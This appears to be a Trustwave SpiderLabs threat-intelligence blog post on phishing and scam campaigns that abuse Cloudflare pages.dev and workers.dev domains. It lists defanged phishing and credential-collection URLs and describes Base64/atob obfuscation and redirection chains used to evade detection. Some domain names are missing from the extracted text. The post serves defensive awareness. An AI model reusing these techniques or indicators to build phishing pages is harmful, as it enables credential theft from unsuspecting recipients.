Trustwave Rapid Response: CrowdStrike Falcon Outage Update. Learn More

Trustwave Rapid Response: CrowdStrike Falcon Outage Update. Learn More

Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

It’s Raining Phish and Scams – How Cloudflare and Domains Get Abused

As they say, when it rains, it pours. Recently, we observed more than 3,000 phishing emails containing phishing URLs abusing services at and domains.

What is .dev Top Level Domain (TLD)?

The .dev  top-level domain name is operated by Google. It is incorporated on the HTTP Strict Transport Security (HSTS) preload list, requiring HTTPS on all .dev domains without individual HSTS enlistment.

Cloudflare Pages vs Workers

Both and domains are part of Cloudflare’s web development and hosting services. Even though both of these domains offer web development services under Cloudflare, there’s some significant differences between them.

In Cloudflare Pages, the developers can deploy their project by connecting to a Git provider, while in Cloudflare Workers, it provides a serverless execution environment. With, you can build your page and deploy it using your local resources.

Comparing the two Cloudflare services, despite the free trial offered in it seems is the most abused domain, probably because of the convenience and benefit of using a Git provider like GitHub in web development.

Abused Cloudflare Domains in Phishing Emails

As mentioned earlier, we observed a lot of phishing emails containing URLs using the domains or Most of the phishing emails mimicking different companies using different alarming subjects related to payment details, voicemails, pending inquiries, etc. Some of the URLs in these emails used * as redirection, and some are the actual phishing page.

Phishing email mimicking financial services company:


Figure 1. The email header containing spoofed rom address pretending to be from Westpac


Figure 1.1 Email body containing details about the payment made though Westpac

The email body also contains a phishing URL link that uses the domain and contains the recipient’s email in the URL path.


Figure 2. Screenshot of the actual phishing URL hxxp://a211a49a8bb35[.]pages[.]dev/?email={email address}

Phishing email with URL redirection:


Figure 3. The email header contains malicious mailer[.]php in X-PHP-Script

The mailer script sondakikatokathaberleri[.]name[.]tr/hash/demo/mailer.php was used to compose and send the phishing email to the recipient.


Figure 3.1 Screenshot of sondakikatokathaberleri[.]name[.]tr/hash/demo/mailer.php

However, the domain sondakikatokathaberleri[.]name[.]tr seems to be a WordPress site still under construction.


Figure 3.2 Screenshot of sondakikatokathaberleri[.]name[.]tr


Figure 4. The email body that requires recipient for account update

The email body contains a clickable link that contains the original URL hxxps://3f303073[.]45564355zezdfxc56e667[.] and it contains JavaScript hosted on a site that redirects to hxxps://helpsana[.]ro/wp-hash/1/index4[.]php which is the actual phishing page.


Figure 4.1 Screenshot of the source code of the URL containing phishing redirection


Figure 4.2 Screenshot of the phishing URL hxxps://helpsana[.]ro/wp-hash/1/index4[.]php

Other Phishing URLs with Cloudflare Pages and Workers

A phishing URL using was also seen targeting Microsoft. The source code contains an atob function and uses a variable containing the Base64 string. The atob function decodes a string which has been encoded in Base64 encoding.


Figure 5. Screenshot of the actual phishing URL hxxps://1-d0asfasfjhasfa7979352jhasf.pages[.]dev/

However, when the Base64 string was decoded, it contained the URL hxxps://tutu57tututut[.]000webhostapp[.]com/don[.]php where the stolen credentials will be stored.



Figure 5.1 Screenshot of the source code with usage of variable ‘olafatob’

Below is another sample of a phishing URL that uses the domain targeting Dropbox. The page uses a similar decoding or obfuscation technique using the atob function.


Figure 6. Screenshot of Phishing URL



Figure 7. Screenshot of the encoded source code and usage of atob function

Cloudflare Pages and Workers in VirusTotal

On the other hand, over a 90-day period we observed in VirusTotal that there were at least 60,000 URLs containing the domain, and the majority were being used in phishing activity.


Figure 8. Screenshot of a sample of URLs queried in VirusTotal with

Meanwhile, at least 65,000 URLs were also seen for the past 90 days. More than 11,000 URLs were related to scam or fake news, and they are being blocked only by Trustwave:


Figure 9. Screenshot of the URLs query in VirusTotal


Figure 10. Screenshot of the fake news site

These scam URLs use keywords like cash, money, job, etc. on the domain name followed by 1-3 digits and often contain URL links that redirect to another scam site.


Figure 11. Screenshot of the sample redirection to another scam URL

As of this writing, some of the scam or phishing URLs have already been taken down by Cloudflare due to malicious activity.


We are seeing a huge number of phishing and scam pages abusing these .dev Cloudflare services. Some phishers abused the free web services in a large-scale way. We need to be very wary of and links that we see in email. Most of the phishing or even scam pages we’re seeing use redirection or encoded strings in page content to avoid getting easily detected by AV products. However, Trustwave MailMarshal has protections for these campaigns.

Staying vigilant and updated on the latest threats is the most powerful key to avoid becoming a victim of such phishing or scams.










Some Samples of Scam or Fake News URLs with a Common Domain Format









Latest SpiderLabs Blogs

Trustwave Rapid Response: CrowdStrike Falcon Outage Update

Trustwave is proactively assessing and monitoring our clients who may have been impacted by CrowdStrike’s recently rolled-out update for its Windows users. The critical issue identified with...

Read More

Using AWS Secrets Manager and Lambda Function to Store, Rotate and Secure Keys

When working with Amazon Web Services (AWS), we often find that various AWS services need to store and manage secrets. AWS Secrets Manager is the go-to solution for this. It's a centralized service...

Read More

Facebook Malvertising Epidemic – Unraveling a Persistent Threat: SYS01

The Trustwave SpiderLabs Threat Intelligence team's ongoing study into how threat actors use Facebook for malicious activity has uncovered a new version of the SYS01 stealer. This stealer is designed...

Read More